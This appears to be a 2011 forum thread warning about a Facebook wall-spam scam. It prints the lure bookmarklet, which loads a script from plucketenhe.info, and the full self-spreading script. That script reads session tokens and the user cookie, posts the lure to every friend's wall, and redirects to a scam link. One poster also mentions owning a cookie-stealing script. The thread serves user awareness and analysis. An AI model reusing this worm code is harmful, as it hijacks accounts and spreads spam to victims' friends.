Support Forums
Another Facebook Scam/Spam - Printable Version

+- Support Forums (https://www.supportforums.net)
+-- Forum: Categories (https://www.supportforums.net/forumdisplay.php?fid=87)
+--- Forum: Life Support (https://www.supportforums.net/forumdisplay.php?fid=12)
+---- Forum: Omni's Secret Hidden Inside Tricks (https://www.supportforums.net/forumdisplay.php?fid=13)
+---- Thread: Another Facebook Scam/Spam (/showthread.php?tid=18693)

Another Facebook Scam/Spam - Metapod - 05-11-2011

This was posted to my Wall earlier today...

In order to PREVENT SPAM, I ask that you VERIFY YOUR ACCOUNT. Click VERIFY MY ACCOUNT right next to comment below to start the process...

The "verification" link is...

Code:
javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://plucketenhe.info/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();

First of all, I don't have protection on my browser right now so... not going to check that out. But the domain plucketenhe doesn't sound legit. So I wouldn't recommend clicking this.

Edit: At the moment, it appears that 3 people have posted to my wall from iPhones.

RE: Another Facebook Scam/Spam - Deltron - 05-11-2011

Facebook spam these days are become quite meticulous. The link being next to that of the Like and Comment buttons make it even more believable.

Thanks for the heads up.

RE: Another Facebook Scam/Spam - Gaijin - 05-11-2011

Gets your friends and spamms their walls.... Looks like o.O

Code:
var message = "In order to PREVENT SPAM, I ask that you VERIFY YOUR ACCOUNT. Click VERIFY MY ACCOUNT right next to comment below to start the process...";
var jsText = "javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://plucketenhe.info/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();";
var myText = "==>[VERIFY MY ACCOUNT]<==";

var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

var friends = new Array();
gf = new XMLHttpRequest();
gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false);
gf.send();
if(gf.readyState!=4){ }else{
    data = eval('(' + gf.responseText.substr(9) + ')');
    if(data.error){ }else{
        friends = data.payload.entries.sort(function(a,b){return a.index-b.index;});
    }
}
for(var i=0; i<friends.length; i++){
    var httpwp = new XMLHttpRequest();
    var urlwp = "http://www.facebook.com/fbml/ajax/prompt_feed.php?__a=1";
    var paramswp = "&__d=1&app_id=6628568379&extern=0&" +
                   "&post_form_id=" + post_form_id +
                   "&fb_dtsg=" + fb_dtsg +
                   "&feed_info[action_links][0][href]=" + encodeURIComponent(jsText) +
                   "&feed_info[action_links][0][text]=" + encodeURIComponent(myText) +
                   "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid +
                   "&user_message=" + message;
    httpwp.open("POST", urlwp, true);
    httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    httpwp.setRequestHeader("Content-length", paramswp.length);
    httpwp.setRequestHeader("Connection", "keep-alive");
    httpwp.onreadystatechange = function(){
        if (httpwp.readyState == 4 && httpwp.status == 200){
            
        }
    }
    httpwp.send(paramswp);
}
alert("Verification Failed. Click 'OK' and follow the steps to prevent your account from being deleted.");
document.location = "http://qite.ws/gl2o1";


RE: Another Facebook Scam/Spam - Metapod - 05-11-2011

What does this do?

alert("Verification Failed. Click 'OK' and follow the steps to prevent your account from being deleted.");
document.location = "http://qite.ws/gl2o1";

RE: Another Facebook Scam/Spam - Gaijin - 05-12-2011

(05-11-2011, 11:53 PM)Veryx Wrote: What does this do?

alert("Verification Failed. Click 'OK' and follow the steps to prevent your account from being deleted.");
document.location = "http://qite.ws/gl2o1";


It's a fake error, and redirect to the same page again, http: //plucketenhe.info but it didn't load....


RE: Another Facebook Scam/Spam - HCrew - 05-14-2011

fb viral script

RE: Another Facebook Scam/Spam - Telhast - 05-15-2011

Scripts like these are usually developed to steal cookies stored in your browser. I currently have one that steals cookies stored for yahoo and hence giving access to their account. I will analyze this script and edit this post and update you with my findings.